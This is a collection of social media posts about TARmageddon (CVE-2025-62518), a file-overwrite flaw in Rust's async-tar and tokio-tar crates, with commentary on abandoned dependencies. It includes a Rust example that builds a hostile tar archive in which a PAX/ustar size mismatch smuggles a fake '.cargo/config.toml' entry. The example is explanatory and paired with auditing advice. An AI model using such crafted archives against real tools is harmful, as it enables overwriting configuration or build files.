https://edera.dev/stories/tarmageddon #TARmageddon (CVE-2025-62518): RCE Vulnerability Highlights the Challenges of #OpenSourceAbandonware; how the community can mitigate this: https://purl.org/rzr/abandonware
CVE-2025-62518 Shows the Cost of Open Source Abandonware

Edera uncovers TARmageddon (CVE-2025-62518), a Rust async-tar RCE flaw exposing the real dangers of open-source abandonware and supply chain security.

Edera

In this episode of #OpenSourceSecurity I chat with Alex Zenla from Edera about the #TARmageddon vulnerability they found

I've coordinated a lot of vulnerabilities in my day, but never have I had to even think about something as difficult as this one. Alex fills us in on how it was found, what the coordination looked like, and some things to think about as we manage these incredibly complex supply chains

https://opensourcesecurity.io/2025/2025-12-tarmageddon-alex/

TARmageddon with Alex Zenla

Josh discusses the TARmageddon vulnerability with Alex Zenla, CTO of Edera. In this episode, we explore the discovery of the TARmageddon vulnerability. It’s especially interesting because it’s Rust, but also involves multiple end-of-life crates. Alex shares the story of how Edera managed to figure all this out (it was not simple). Hard problems are still hard, but there’s a lot of lessons in this one. Episode links: Alex Zenla, TARmageddon. This episode is also available as a podcast; search for “Open Source Security” on your favorite podcast player.

Open Source Security

🪤 TARmageddon (CVE-2025-62518): RCE Vulnerability Highlights the Challenges of Open Source Abandonware

「 In the worst-case scenario, this vulnerability has a severity of 8.1 (High) and can lead to Remote Code Execution (RCE) through file overwriting attacks, such as replacing configuration files or hijacking build backends 」

https://edera.dev/stories/tarmageddon

#TARmageddon #CVE202562518 #rust #rce #cybersecurity

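The quote above gives the impact (file overwrite, possible RCE via replaced configuration files or build backends) but none of the posts on this page describe the parsing mechanism. Edera's write-up linked above describes it as a desynchronization between the size declared in a PAX extended header and the size in the following ustar header. The block below is an added example written for this page, not code from Edera, async-tar or tokio-tar: a minimal tar walker over a constructed in-memory archive (the entry names `payload.txt`, `.cargo/config.toml` and `notes.txt`, and the `PWNED` content, are made up) that can advance either by the ustar size or by the PAX size, so the two behaviours can be compared on the same bytes.

```rust
// Added example (not from Edera, async-tar or tokio-tar): a minimal tar walker
// over a constructed in-memory archive, showing how a PAX/ustar size
// disagreement desynchronizes a reader that skips by the wrong size field.
const BLOCK: usize = 512;

/// One archive entry as the reader reports it.
#[derive(Debug, Clone, PartialEq)]
pub struct Entry { pub name: String, pub size: u64 }

/// Parse a NUL/space-terminated octal field (the ustar size lives at 124..136).
fn octal_field(field: &[u8]) -> u64 {
    let s = String::from_utf8_lossy(field);
    u64::from_str_radix(s.trim_matches(|c: char| c == '\0' || c == ' '), 8).unwrap_or(0)
}

fn ustar_name(header: &[u8]) -> String {
    let end = header[..100].iter().position(|&b| b == 0).unwrap_or(100);
    String::from_utf8_lossy(&header[..end]).into_owned()
}

/// Return the `size` record of a PAX extended header body ("<len> key=value\n").
fn pax_size(body: &[u8]) -> Option<u64> {
    let text = std::str::from_utf8(body).ok()?;
    for record in text.split_terminator('\n') {
        let kv = match record.split_once(' ') { Some((_, kv)) => kv, None => continue };
        if let Some(v) = kv.strip_prefix("size=") {
            return v.parse().ok();
        }
    }
    None
}

fn round_up(n: usize) -> usize { (n + BLOCK - 1) / BLOCK * BLOCK }

/// Walk the archive. With `skip_by_pax` false the reader reports the PAX size but
/// advances by the ustar size (the desync); with it true the PAX size governs both.
pub fn list_entries(archive: &[u8], skip_by_pax: bool) -> Vec<Entry> {
    let (mut out, mut pos, mut pending_pax) = (Vec::new(), 0usize, None::<u64>);
    while pos + BLOCK <= archive.len() {
        let header = &archive[pos..pos + BLOCK];
        if header.iter().all(|&b| b == 0) {
            break; // end-of-archive marker
        }
        let raw_size = octal_field(&header[124..136]);
        pos += BLOCK;
        if header[156] == b'x' {
            // PAX extended header: its records apply to the next entry.
            let end = (pos + raw_size as usize).min(archive.len());
            pending_pax = pax_size(&archive[pos..end]);
            pos += round_up(raw_size as usize);
            continue;
        }
        let reported = pending_pax.take().unwrap_or(raw_size);
        let skip = if skip_by_pax { reported } else { raw_size };
        out.push(Entry { name: ustar_name(header), size: reported });
        pos += round_up(skip as usize);
    }
    out
}

/// Build a ustar header block with a valid checksum (constructed test data).
fn ustar_header(name: &str, size: u64, typeflag: u8) -> [u8; BLOCK] {
    let mut h = [0u8; BLOCK];
    h[..name.len()].copy_from_slice(name.as_bytes());
    h[100..108].copy_from_slice(b"0000644\0");
    h[124..136].copy_from_slice(format!("{:011o}\0", size).as_bytes());
    h[148..156].copy_from_slice(b"        "); // checksum field counts as spaces
    h[156] = typeflag;
    h[257..263].copy_from_slice(b"ustar\0");
    h[263..265].copy_from_slice(b"00");
    let sum: u32 = h.iter().map(|&b| b as u32).sum();
    h[148..156].copy_from_slice(format!("{:06o}\0 ", sum).as_bytes());
    h
}

fn data_block(data: &[u8]) -> [u8; BLOCK] {
    let mut b = [0u8; BLOCK];
    b[..data.len()].copy_from_slice(data);
    b
}

/// Constructed hostile archive: PAX says payload.txt is 1024 bytes, its ustar
/// header says 0, and the payload body is itself a smuggled header plus a data
/// block. All names and contents are made up for the illustration.
pub fn hostile_archive() -> Vec<u8> {
    let pax_body = b"13 size=1024\n"; // 13 = length of the whole record
    let mut a = Vec::new();
    a.extend_from_slice(&ustar_header("PaxHeaders/payload.txt", pax_body.len() as u64, b'x'));
    a.extend_from_slice(&data_block(pax_body));
    a.extend_from_slice(&ustar_header("payload.txt", 0, b'0'));
    a.extend_from_slice(&ustar_header(".cargo/config.toml", 5, b'0')); // smuggled
    a.extend_from_slice(&data_block(b"PWNED"));
    a.extend_from_slice(&ustar_header("notes.txt", 5, b'0'));
    a.extend_from_slice(&data_block(b"hello"));
    a.extend_from_slice(&[0u8; 2 * BLOCK]);
    a
}

fn main() {
    let archive = hostile_archive();
    println!("skip by ustar size: {:?}", list_entries(&archive, false));
    println!("skip by PAX size:   {:?}", list_entries(&archive, true));
}
```

Running `main` prints two listings of the same bytes: the reader that advances by the ustar size reports three entries, the middle one being the header smuggled inside `payload.txt`'s body, while the reader that advances by the PAX size sees only `payload.txt` and `notes.txt`. When auditing a tar implementation, check that the PAX `size` record governs both the reported size and the byte skip, and consider treating a non-zero ustar size that disagrees with the PAX size as malformed rather than picking one silently.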

Rust async tar libraries are affected by a High-severity (8.1) vulnerability, CVE-2025-62518 “TARmageddon”, which allows potential RCE and supply-chain attacks.

https://forum.hashpwn.net/post/5906

#rust #cve_2025_62518 #TARmageddon #tar #cybersecurity #news #hashpwn

I Never Thought I’d See This

YouTube
So apparently #Tarmageddon is a thing…

While the RCE claim seems bullshit, going by what I’ve heard about it, it wouldn’t have shocked me, given how much unsafe people use in practice, but that isn’t the interesting thing here…

The notable thing is that this is in a widely used unmaintained dependency, making it the exact kind of issue I’ve been warning about for ages and one of the prime reasons I still can’t really get myself to use #Rust: instead of focusing on a small number of well-maintained, highly established packages like, for example, Boost (in C++), everything is its own crate, mirroring the hellscape that is node, and when you complain about it, the defense is always version pinning.

Guess what: version pinning prevents updates to newer versions that contain fixes and especially doesn’t help with unmaintained software!

Rust has a decent (but not perfect!) technical foundation, but the culture around it really is something that repels me every time…
🌗 TARmageddon (CVE-2025-62518) vulnerability: remote code execution risk highlights the challenges of abandoned open-source projects
➤ Abandoned open-source libraries and the security dilemma: the TARmageddon vulnerability revealed
https://edera.dev/stories/tarmageddon
The Edera team discovered a serious vulnerability named TARmageddon (CVE-2025-62518) in the Rust `async-tar` library and its forks (including the widely used `tokio-tar`). The vulnerability allows an attacker to achieve remote code execution (RCE) by manipulating file overwrites, and affects many well-known projects such as `uv` and `testcontainers`. Because `tokio-tar` is widely used but no longer maintained, fixing the vulnerability was a major challenge; the Edera team coordinated a distributed disclosure and patching effort with the maintainers of the various forks, and recommends that users update to patched versions immediately or migrate to an actively maintained fork.
+ This vulnerability is really scary, and the impact is so broad. Thankfully the Edera team put in the effort, otherwise who knows what would have happened.
+ Open-source projects without a maintainer really
#InfoSec #OpenSource #Vulnerability #RCE #TARmageddon #CVE
Ah, the joys of #open source! 🤦‍♂️ #TARmageddon strikes with a #CVE number longer than a CVS receipt, proving once again that "free" code is never free from #hilarious mishaps! 🎉 Who knew #parsing #bugs could be this entertaining? 🙃
https://edera.dev/stories/tarmageddon #source #mishaps #HackerNews #ngated